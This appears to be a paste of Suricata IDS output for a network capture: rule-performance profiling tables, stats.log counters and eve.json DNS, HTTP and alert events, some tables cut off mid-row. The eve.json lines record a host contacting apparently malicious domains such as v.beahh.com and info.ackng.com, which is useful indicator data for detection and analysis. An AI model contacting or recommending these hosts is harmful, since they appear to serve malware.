tls_cert_subject                  IPv4       6             1             7820           7820          7820         7.8k  0.00  
tls_cert_serial                   IPv4       6             1             7118           7118          7118         7.1k  0.00  
file_data (http response)         IPv4       6          1771             2570       15516895        111192       196.9m  59.57 
Total                             IPv4                  7594                                         43489       330.3m
payload                           IPv6      17            17             9734          70963         17708       301.0k  0.09  
Total                             IPv6                    17                                         17708       301.0k

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       1             3             4194          16739          9751         29.3k  0.00  
PROF_DETECT_IPONLY          IPv4       6         13026             3211       14262567         25839        336.6m  12.06 
PROF_DETECT_IPONLY          IPv4      17            26             9543          83778         32998        858.0k  0.03  
PROF_DETECT_RULES           IPv4       1             3             2542           2568          2557          7.7k  0.00  
PROF_DETECT_RULES           IPv4       6         16826             2530       11677903         48245        811.8m  29.07 
PROF_DETECT_RULES           IPv4      17            51            71020         462296        136038          6.9m  0.25  
PROF_DETECT_STATEFUL_START    IPv4       6          1553             5114        6621970         28411         44.1m  1.58  
PROF_DETECT_STATEFUL_CONT    IPv4       1             3             2560           3173          2818          8.5k  0.00  
PROF_DETECT_STATEFUL_CONT    IPv4       6         16826             2500        6623338          7275        122.4m  4.38  
PROF_DETECT_STATEFUL_CONT    IPv4      17            51             2579          37777          4780        243.8k  0.01  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          2867             2565          62392          3177          9.1m  0.33  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            16             2698           4272          3272         52.4k  0.00  
PROF_DETECT_PREFILTER       IPv4       1             3            19968          30039         25779         77.3k  0.00  
PROF_DETECT_PREFILTER       IPv4       6         16826             7701       15641370         34348        577.9m  20.70 
PROF_DETECT_PREFILTER       IPv4      17            51            26357         135812         62345          3.2m  0.11  
PROF_DETECT_PF_PAYLOAD      IPv4       1             3             9458          18904         14979         44.9k  0.00  
PROF_DETECT_PF_PAYLOAD      IPv4       6          1832            14120        7221024         74163        135.9m  4.87  
PROF_DETECT_PF_PAYLOAD      IPv4      17            51            10278         114591         40234          2.1m  0.07  
PROF_DETECT_PF_TX           IPv4       6          2867             2573       15535741         84826        243.2m  8.71  
PROF_DETECT_PF_TX           IPv4      17             8            11357          18028         14907        119.3k  0.00  
PROF_DETECT_PF_SORT1        IPv4       6          1241             2529          43927          3636          4.5m  0.16  
PROF_DETECT_PF_SORT1        IPv4      17            51             2833           5851          4144        211.4k  0.01  
PROF_DETECT_PF_SORT2        IPv4       1             3             2539           2599          2560          7.7k  0.00  
PROF_DETECT_PF_SORT2        IPv4       6         16826             2514        4624715          3326         56.0m  2.00  
PROF_DETECT_PF_SORT2        IPv4      17            51             2555           4787          3336        170.2k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       1             3             2761           2811          2782          8.3k  0.00  
PROF_DETECT_NONMPMLIST      IPv4       6         16826             2527        6266657          3516         59.2m  2.12  
PROF_DETECT_NONMPMLIST      IPv4      17            51             2632           4413          3280        167.3k  0.01  
PROF_DETECT_ALERT           IPv4       1             3             2553           2592          2571          7.7k  0.00  
PROF_DETECT_ALERT           IPv4       6         16826             2523        6712136         11728        197.3m  7.07  
PROF_DETECT_ALERT           IPv4      17            51             2525          15551          3294        168.0k  0.01  
PROF_DETECT_CLEANUP         IPv4       1             3             2510           2678          2582          7.7k  0.00  
PROF_DETECT_CLEANUP         IPv4       6         16826             2544        6138051          4019         67.6m  2.42  
PROF_DETECT_CLEANUP         IPv4      17            51             2527           5907          3485        177.7k  0.01  
PROF_DETECT_GETSGH          IPv4       1             3             2750           2836          2795          8.4k  0.00  
PROF_DETECT_GETSGH          IPv4       6         16826             2518       16210252          6425        108.1m  3.87  
PROF_DETECT_GETSGH          IPv4      17            51             2687          16359          6064        309.3k  0.01  
PROF_DETECT_IPONLY          IPv6      17             3             7378           8364          7783         23.4k  0.00  

This file has been truncated. Go here to download in full.


suricata-4.0.0-etopen-all-perf.txt-2019-06-28-T-02-55-17-04032019.1339-network.pcap.txt - (37078 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
  --------------------------------------------------------------------------
  Date: 6/28/2019 -- 02:55:17. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2010935      1        3        150340955    24.09  13784    6699     11642478    10906.92    19395.43    2880.87    
  2        2019345      1        2        10609345     1.70   234      0        6949644     45339.08    0.00        45339.08   
  3        2022547      1        1        7533973      1.21   255      0        6684034     29544.99    0.00        29544.99   
  4        2020865      1        3        30825712     4.94   180      0        6633343     171253.96   0.00        171253.96  
  5        2024771      1        1        18289957     2.93   1758     0        6587857     10403.84    0.00        10403.84   
  6        2102523      1        8        47343573     7.59   13806    0        6584928     3429.20     0.00        3429.20    
  7        2020569      1        1        7533750      1.21   15       0        6560779     502250.00   0.00        502250.00  
  8        2001583      1        16       212574183    34.06  13784    13784    6305011     15421.81    15421.81    0.00       
  9        2016502      1        2        4593630      0.74   161      0        2074589     28531.86    0.00        28531.86   
  10       2018982      1        2        1075349      0.17   15       0        409694      71689.93    0.00        71689.93   
  11       2022050      1        3        955869       0.15   15       0        328817      63724.60    0.00        63724.60   
  12       2021749      1        6        255180       0.04   6        0        240619      42530.00    0.00        42530.00   
  13       2018789      1        3        379269       0.06   6        0        203914      63211.50    0.00        63211.50   
  14       2016855      1        2        438259       0.07   11       0        196565      39841.73    0.00        39841.73   
  15       2016854      1        3        395790       0.06   11       0        156315      35980.91    0.00        35980.91   
  16       2021586      1        3        154408       0.02   1        0        154408      154408.00   0.00        154408.00  
  17       2018316      1        4        219814       0.04   3        0        139353      73271.33    0.00        73271.33   
  18       2021434      1        2        133776       0.02   1        0        133776      133776.00   0.00        133776.00  
  19       2021432      1        2        133117       0.02   1        0        133117      133117.00   0.00        133117.00  
  20       2021433      1        2        127320       0.02   1        0        127320      127320.00   0.00        127320.00  
  21       2014819      1        3        210652       0.03   3        0        122220      70217.33    0.00        70217.33   
  22       2012981      1        5        177569       0.03   3        0        115599      59189.67    0.00        59189.67   
  23       2008575      1        5        16994729     2.72   1784     0        104864      9526.19     0.00        9526.19    
  24       2023476      1        5        102184       0.02   1        0        102184      102184.00   0.00        102184.00  
  25       2016537      1        2        16488355     2.64   1032     1        100280      15977.09    69069.00    15925.59   
  26       2024650      1        1        4300184      0.69   266      0        99232       16166.11    0.00        16166.11   
  27       2017552      1        6        16175732     2.59   1045     0        90560       15479.17    0.00        15479.17   
  28       2016112      1        3        3054121      0.49   177      0        84108       17254.92    0.00        17254.92   
  29       2019714      1        10       79560        0.01   1        1        79560       79560.00    79560.00    0.00       
  30       2021954      1        2        958274       0.15   60       0        71016       15971.23    0.00        15971.23   
  31       2018005      1        6        87607        0.01   6        0        70847       14601.17    0.00        14601.17   
  32       2016141      1        5        70745        0.01   1        1        70745       70745.00    70745.00    0.00       
  33       2001330      1        8        5636304      0.90   1732     0        70572       3254.22     0.00        3254.22    
  34       2021702      1        1        292911       0.05   64       0        69690       4576.73     0.00        4576.73    
  35       2018241      1        2        288615       0.05   60       0        69130       4810.25     0.00        4810.25    
  36       2024777      1        2        1050685      0.17   309      0        68631       3400.28     0.00        3400.28    
  37       2024769      1        2        68467        0.01   1        0        68467       68467.00    0.00        68467.00   
  38       2008303      1        3        274163       0.04   66       0        68389       4153.98     0.00        4153.98    
  39       2015744      1        4        101629       0.02   12       1        67155       8469.08     67155.00    3134.00    
  40       2020661      1        3        506983       0.08   118      0        65266       4296.47     0.00        4296.47    
  41       2018959      1        3        253673       0.04   60       1        64473       4227.88     64473.00    3206.78    
  42       2025142      1        2        220608       0.04   4        0        63494       55152.00    0.00        55152.00   
  43       2018382      1        8        324696       0.05   66       0        61707       4919.64     0.00        4919.64    
  44       2021312      1        2        970882       0.16   60       0        58197       16181.37    0.00        16181.37   
  45       2024909      1        2        2867238      0.46   130      0        58097       22055.68    0.00        22055.68   
  46       2018464      1        4        956563       0.15   60       0        57163       15942.72    0.00        15942.72   
  47       2022482      1        3        56933        0.01   1        0        56933       56933.00    0.00        56933.00   
  48       2022552      1        2        4757784      0.76   215      0        56871       22129.23    0.00        22129.23   
  49       2009897      1        14       100943       0.02   15       0        56575       6729.53     0.00        6729.53    
  50       2019155      1        2        150052       0.02   4        0        54973       37513.00    0.00        37513.00   
  51       2024829      1        2        3639726      0.58   160      0        54844       22748.29    0.00        22748.29   
  52       2014353      1        6        249260       0.04   60       0        54531       4154.33     0.00        4154.33    
  53       2013352      1        4        241860       0.04   60       0        54303       4031.00     0.00        4031.00    
  54       2008438      1        20       723607       0.12   15       0        53599       48240.47    0.00        48240.47   
  55       2022653      1        2        932120       0.15   60       0        53470       15535.33    0.00        15535.33   
  56       2014473      1        5        3145987      0.50   198      0        53016       15888.82    0.00        15888.82   
  57       2017190      1        6        52724        0.01   1        0        52724       52724.00    0.00        52724.00   
  58       2023671      1        4        951516       0.15   60       0        52089       15858.60    0.00        15858.60   
  59       2016143      1        3        2602372      0.42   147      0        50215       17703.21    0.00        17703.21   
  60       2022896      1        5        49103        0.01   1        0        49103       49103.00    0.00        49103.00   
  61       2019103      1        4        981283       0.16   60       0        48329       16354.72    0.00        16354.72   
  62       2019165      1        3        936463       0.15   60       0        48081       15607.72    0.00        15607.72   
  63       2022502      1        4        207340       0.03   5        0        47600       41468.00    0.00        41468.00   
  64       2018121      1        4        46992        0.01   1        0        46992       46992.00    0.00        46992.00   
  65       2017748      1        6        3207679      0.51   198      0        46222       16200.40    0.00        16200.40   
  66       2022535      1        11       46220        0.01   1        0        46220       46220.00    0.00        46220.00   
  67       2021067      1        2        164185       0.03   4        0        45981       41046.25    0.00        41046.25   
  68       2017114      1        5        45837        0.01   1        0        45837       45837.00    0.00        45837.00   
  69       2022051      1        2        905792       0.15   60       0        45734       15096.53    0.00        15096.53   
  70       2013441      1        9        90428        0.01   15       0        45625       6028.53     0.00        6028.53    
  71       2009909      1        10       92647        0.01   15       0        45580       6176.47     0.00        6176.47    
  72       2020573      1        2        44436        0.01   1        1        44436       44436.00    44436.00    0.00       
  73       2020421      1        2        938085       0.15   60       0        44403       15634.75    0.00        15634.75   
  74       2014471      1        6        43890        0.01   1        0        43890       43890.00    0.00        43890.00   
  75       2018581      1        3        43249        0.01   1        0        43249       43249.00    0.00        43249.00   
  76       2024848      1        2        167087       0.03   4        0        43079       41771.75    0.00        41771.75   
  77       2022627      1        12       43067        0.01   1        0        43067       43067.00    0.00        43067.00   
  78       2014288      1        2        42870        0.01   1        0        42870       42870.00    0.00        42870.00   
  79       2022609      1        2        182458       0.03   5        0        42103       36491.60    0.00        36491.60   
  80       2009028      1        11       225193       0.04   60       0        41787       3753.22     0.00        3753.22    
  81       2017295      1        6        41257        0.01   1        0        41257       41257.00    0.00        41257.00   
  82       2022334      1        2        155596       0.02   5        0        41008       31119.20    0.00        31119.20   
  83       2016503      1        2        2466905      0.40   161      0        40847       15322.39    0.00        15322.39   
  84       2012969      1        2        40653        0.01   1        0        40653       40653.00    0.00        40653.00   
  85       2022658      1        4        39783        0.01   1        0        39783       39783.00    0.00        39783.00   
  86       2014701      1        12       243543       0.04   16       0        39588       15221.44    0.00        15221.44   
  87       2021068      1        2        39499        0.01   1        1        39499       39499.00    39499.00    0.00       
  88       2016029      1        3        39337        0.01   1        0        39337       39337.00    0.00        39337.00   
  89       2015547      1        4        39222        0.01   1        0        39222       39222.00    0.00        39222.00   
  90       2017693      1        2        39186        0.01   1        0        39186       39186.00    0.00        39186.00   
  91       2022830      1        2        38970        0.01   1        0        38970       38970.00    0.00        38970.00   
  92       2018403      1        10       38867        0.01   1        0        38867       38867.00    0.00        38867.00   
  93       2021775      1        2        38663        0.01   1        0        38663       38663.00    0.00        38663.00   
  94       2019230      1        2        197599       0.03   14       0        38459       14114.21    0.00        14114.21   
  95       2018375      1        3        1062436      0.17   66       0        38148       16097.52    0.00        16097.52   
  96       2020742      1        1        100544       0.02   3        0        38017       33514.67    0.00        33514.67   
  97       2018666      1        4        107966       0.02   3        0        37393       35988.67    0.00        35988.67   
  98       2016097      1        4        37050        0.01   1        0        37050       37050.00    0.00        37050.00   
  99       2011457      1        8        36631        0.01   1        0        36631       36631.00    0.00        36631.00   
  100      2020741      1        1        103292       0.02   3        0        36617       34430.67    0.00        34430.67   
  101      2022270      1        2        36234        0.01   1        0        36234       36234.00    0.00        36234.00   
  102      2022942      1        2        36223        0.01   1        0        36223       36223.00    0.00        36223.00   
  103      2022804      1        2        35963        0.01   1        0        35963       35963.00    0.00        35963.00   
  104      2021245      1        6        35568        0.01   1        0        35568       35568.00    0.00        35568.00   
  105      2021076      1        2        220495       0.04   60       1        35465       3674.92     35465.00    3136.10    
  106      2023626      1        3        219335       0.04   60       0        35226       3655.58     0.00        3655.58    
  107      2024775      1        1        355391       0.06   96       0        35019       3701.99     0.00        3701.99    
  108      2020826      1        7        34515        0.01   1        0        34515       34515.00    0.00        34515.00   
  109      2020941      1        2        34484        0.01   1        0        34484       34484.00    0.00        34484.00   
  110      2022197      1        3        131095       0.02   4        0        34425       32773.75    0.00        32773.75   
  111      2014913      1        2        34035        0.01   1        0        34035       34035.00    0.00        34035.00   
  112      2016578      1        5        33812        0.01   1        0        33812       33812.00    0.00        33812.00   
  113      2022940      1        2        33794        0.01   1        0        33794       33794.00    0.00        33794.00   
  114      2023679      1        3        916997       0.15   60       0        33684       15283.28    0.00        15283.28   
  115      2009549      1        6        33428        0.01   1        0        33428       33428.00    0.00        33428.00   
  116      2023083      1        2        33382        0.01   1        0        33382       33382.00    0.00        33382.00   
  117      2013031      1        5        123348       0.02   4        4        32907       30837.00    30837.00    0.00       
  118      2017669      1        5        32692        0.01   1        1        32692       32692.00    32692.00    0.00       
  119      2022550      1        16       32478        0.01   1        0        32478       32478.00    0.00        32478.00   
  120      2013036      1        7        32143        0.01   1        0        32143       32143.00    0.00        32143.00   
  121      2018421      1        2        31522        0.01   1        0        31522       31522.00    0.00        31522.00   
  122      2013037      1        7        31384        0.01   1        0        31384       31384.00    0.00        31384.00   
  123      2018928      1        3        31236        0.01   1        0        31236       31236.00    0.00        31236.00   
  124      2018457      1        1        42677        0.01   4        0        31073       10669.25    0.00        10669.25   
  125      2018556      1        2        3

This file has been truncated. Go here to download in full.


stats.log - (3245 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
------------------------------------------------------------------------------------
Date: 6/28/2019 -- 02:55:17 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 17667
decoder.bytes                              | Total                     | 3740503
decoder.ipv4                               | Total                     | 16879
decoder.ipv6                               | Total                     | 17
decoder.ethernet                           | Total                     | 17667
decoder.tcp                                | Total                     | 16825
decoder.udp                                | Total                     | 68
decoder.icmpv4                             | Total                     | 3
decoder.avg_pkt_size                       | Total                     | 211
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 12925
flow.udp                                   | Total                     | 21
tcp.sessions                               | Total                     | 12921
tcp.syn                                    | Total                     | 13802
tcp.synack                                 | Total                     | 14
tcp.rst                                    | Total                     | 110
tcp.overlap                                | Total                     | 4
detect.alert                               | Total                     | 16
detect.nonmpm_list                         | Total                     | 5
detect.fnonmpm_list                        | Total                     | 2
detect.match_list                          | Total                     | 3
app_layer.flow.http                        | Total                     | 11
app_layer.tx.http                          | Total                     | 14
app_layer.flow.tls                         | Total                     | 1
app_layer.flow.dns_udp                     | Total                     | 8
app_layer.tx.dns_udp                       | Total                     | 8
app_layer.flow.failed_udp                  | Total                     | 13
flow_mgr.new_pruned                        | Total                     | 12
flow.spare                                 | Total                     | 9982
flow_mgr.flows_checked                     | Total                     | 3678
flow_mgr.flows_notimeout                   | Total                     | 3678
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 62049
flow_mgr.rows_maxlen                       | Total                     | 4
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 8682496


eve.json - (27462 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
{"timestamp":"2019-03-29T09:47:38.758657+0000","flow_id":1289481952596865,"pcap_cnt":31,"event_type":"dns","src_ip":"192.168.240.16","src_port":62683,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2207,"rrname":"acroipm2.adobe.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:47:40.827629+0000","flow_id":2169537931550957,"pcap_cnt":32,"event_type":"dns","src_ip":"192.168.240.16","src_port":63759,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13503,"rrname":"armmf.corp.adobe.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:47:38.776667+0000","flow_id":2169537931550957,"pcap_cnt":33,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":63759,"proto":"UDP","dns":{"type":"answer","id":13503,"rcode":"NXDOMAIN","rrname":"armmf.corp.adobe.com"}}
{"timestamp":"2019-03-29T09:47:38.776667+0000","flow_id":2169537931550957,"pcap_cnt":33,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":63759,"proto":"UDP","dns":{"type":"answer","id":13503,"rcode":"NXDOMAIN","rrname":"adobe.com","rrtype":"SOA","ttl":133}}
{"timestamp":"2019-03-29T09:47:38.793751+0000","flow_id":1289481952596865,"pcap_cnt":34,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":62683,"proto":"UDP","dns":{"type":"answer","id":2207,"rcode":"NOERROR","rrname":"acroipm2.adobe.com","rrtype":"CNAME","ttl":2639,"rdata":"acroipm2.adobe.com.edgesuite.net"}}
{"timestamp":"2019-03-29T09:47:38.793751+0000","flow_id":1289481952596865,"pcap_cnt":34,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":62683,"proto":"UDP","dns":{"type":"answer","id":2207,"rcode":"NOERROR","rrname":"acroipm2.adobe.com.edgesuite.net","rrtype":"CNAME","ttl":21032,"rdata":"a122.g2.akamai.net"}}
{"timestamp":"2019-03-29T09:47:38.793751+0000","flow_id":1289481952596865,"pcap_cnt":34,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":62683,"proto":"UDP","dns":{"type":"answer","id":2207,"rcode":"NOERROR","rrname":"a122.g2.akamai.net","rrtype":"A","ttl":19,"rdata":"204.237.142.145"}}
{"timestamp":"2019-03-29T09:47:38.793751+0000","flow_id":1289481952596865,"pcap_cnt":34,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":62683,"proto":"UDP","dns":{"type":"answer","id":2207,"rcode":"NOERROR","rrname":"a122.g2.akamai.net","rrtype":"A","ttl":19,"rdata":"204.237.142.136"}}
{"timestamp":"2019-03-29T09:47:38.928936+0000","flow_id":1301013939907171,"pcap_cnt":45,"event_type":"http","src_ip":"192.168.240.16","src_port":49425,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/278_18_11_20038.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:47:38.930545+0000","flow_id":1142426567471536,"pcap_cnt":48,"event_type":"http","src_ip":"192.168.240.16","src_port":49426,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/277_18_11_20038.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:47:38.990968+0000","flow_id":1301013939907171,"pcap_cnt":52,"event_type":"http","src_ip":"192.168.240.16","src_port":49425,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/281_18_11_20038.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:47:38.990968+0000","flow_id":1142426567471536,"pcap_cnt":54,"event_type":"http","src_ip":"192.168.240.16","src_port":49426,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/280_18_11_20038.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:47:40.427087+0000","flow_id":1142426567471536,"pcap_cnt":63,"event_type":"http","src_ip":"192.168.240.16","src_port":49426,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/message.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
{"timestamp":"2019-03-29T09:49:10.060695+0000","flow_id":587005697649943,"pcap_cnt":85,"event_type":"dns","src_ip":"192.168.240.16","src_port":49331,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30006,"rrname":"v.beahh.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:10.079964+0000","flow_id":587005697649943,"pcap_cnt":86,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":49331,"proto":"UDP","dns":{"type":"answer","id":30006,"rcode":"NOERROR","rrname":"v.beahh.com","rrtype":"A","ttl":10,"rdata":"27.102.107.137"}}
{"timestamp":"2019-03-29T09:49:10.689650+0000","flow_id":1395340017559293,"pcap_cnt":101,"event_type":"http","src_ip":"192.168.240.16","src_port":49427,"dest_ip":"27.102.107.137","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"v.beahh.com","url":"\/vWORKGROUP","http_content_type":"text\/plain"}}
{"timestamp":"2019-03-29T09:49:22.984973+0000","flow_id":1395340017559293,"pcap_cnt":102,"event_type":"fileinfo","src_ip":"27.102.107.137","src_port":80,"dest_ip":"192.168.240.16","dest_port":49427,"proto":"TCP","http":{"hostname":"v.beahh.com","url":"\/vWORKGROUP","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6399},"app_proto":"http","fileinfo":{"filename":"\/vWORKGROUP","gaps":false,"state":"CLOSED","stored":false,"size":6399,"tx_id":0}}
{"timestamp":"2019-03-29T09:49:31.426246+0000","flow_id":1142426567471536,"pcap_cnt":106,"event_type":"fileinfo","src_ip":"204.237.142.145","src_port":80,"dest_ip":"192.168.240.16","dest_port":49426,"proto":"TCP","http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/message.zip","http_user_agent":"IPM","http_content_type":"application\/zip","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9737},"app_proto":"http","fileinfo":{"filename":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/message.zip","gaps":false,"state":"CLOSED","stored":false,"size":9737,"tx_id":2}}
{"timestamp":"2019-03-29T09:49:28.626953+0000","flow_id":1960437455819017,"pcap_cnt":110,"event_type":"dns","src_ip":"192.168.240.16","src_port":57392,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54797,"rrname":"info.ackng.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:31.963845+0000","flow_id":1960437455819017,"pcap_cnt":111,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":57392,"proto":"UDP","dns":{"type":"answer","id":54797,"rcode":"NXDOMAIN","rrname":"info.ackng.com"}}
{"timestamp":"2019-03-29T09:49:31.963845+0000","flow_id":1960437455819017,"pcap_cnt":111,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":57392,"proto":"UDP","dns":{"type":"answer","id":54797,"rcode":"NXDOMAIN","rrname":"ackng.com","rrtype":"SOA","ttl":23}}
{"timestamp":"2019-03-29T09:49:30.761257+0000","flow_id":1702486015122857,"pcap_cnt":112,"event_type":"dns","src_ip":"192.168.240.16","src_port":61488,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50892,"rrname":"ip.42.pl","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:34.062260+0000","flow_id":1702486015122857,"pcap_cnt":113,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":61488,"proto":"UDP","dns":{"type":"answer","id":50892,"rcode":"NOERROR","rrname":"ip.42.pl","rrtype":"CNAME","ttl":10460,"rdata":"42.pl"}}
{"timestamp":"2019-03-29T09:49:34.062260+0000","flow_id":1702486015122857,"pcap_cnt":113,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":61488,"proto":"UDP","dns":{"type":"answer","id":50892,"rcode":"NOERROR","rrname":"42.pl","rrtype":"A","ttl":13904,"rdata":"79.98.145.42"}}
{"timestamp":"2019-03-29T09:49:34.063661+0000","flow_id":484862786992301,"pcap_cnt":114,"event_type":"dns","src_ip":"192.168.240.16","src_port":50151,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":63584,"rrname":"info.beahh.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:34.065113+0000","flow_id":484862786992301,"pcap_cnt":116,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":50151,"proto":"UDP","dns":{"type":"answer","id":63584,"rcode":"NXDOMAIN","rrname":"info.beahh.com"}}
{"timestamp":"2019-03-29T09:49:34.065113+0000","flow_id":484862786992301,"pcap_cnt":116,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":50151,"proto":"UDP","dns":{"type":"answer","id":63584,"rcode":"NXDOMAIN","rrname":"beahh.com","rrtype":"SOA","ttl":1067}}
{"timestamp":"2019-03-29T09:49:34.388290+0000","flow_id":1066328344161469,"pcap_cnt":126,"event_type":"alert","src_ip":"192.168.240.16","src_port":49428,"dest_ip":"79.98.145.42","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013031,"rev":5,"signature":"ET POLICY Python-urllib\/ Suspicious User Agent","category":"Attempted Information Leak","severity":2},"app_proto":"http"}
{"timestamp":"2019-03-29T09:49:34.388290+0000","flow_id":1066328344161469,"pcap_cnt":126,"event_type":"http","src_ip":"192.168.240.16","src_port":49428,"dest_ip":"79.98.145.42","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"ip.42.pl","url":"\/raw","http_user_agent":"Python-urllib\/2.7","http_content_type":"text\/html"}}
{"timestamp":"2019-03-29T09:49:34.548857+0000","flow_id":1066328344161469,"pcap_cnt":129,"event_type":"fileinfo","src_ip":"79.98.145.42","src_port":80,"dest_ip":"192.168.240.16","dest_port":49428,"proto":"TCP","http":{"hostname":"ip.42.pl","url":"\/raw","http_user_agent":"Python-urllib\/2.7","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13},"app_proto":"http","fileinfo":{"filename":"\/raw","gaps":false,"state":"CLOSED","stored":false,"size":13,"tx_id":0}}
{"timestamp":"2019-03-29T09:49:32.799257+0000","flow_id":2143686530707993,"pcap_cnt":131,"event_type":"dns","src_ip":"192.168.240.16","src_port":50174,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41144,"rrname":"jsonip.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:49:36.267500+0000","flow_id":2143686530707993,"pcap_cnt":132,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":50174,"proto":"UDP","dns":{"type":"answer","id":41144,"rcode":"NOERROR","rrname":"jsonip.com","rrtype":"A","ttl":280,"rdata":"45.79.77.20"}}
{"timestamp":"2019-03-29T09:49:36.269304+0000","flow_id":619544371534840,"pcap_cnt":134,"event_type":"dns","src_ip":"192.168.240.16","src_port":49762,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43817,"rrname":"info.abbny.com","rrtype":"A","tx_id":0}}
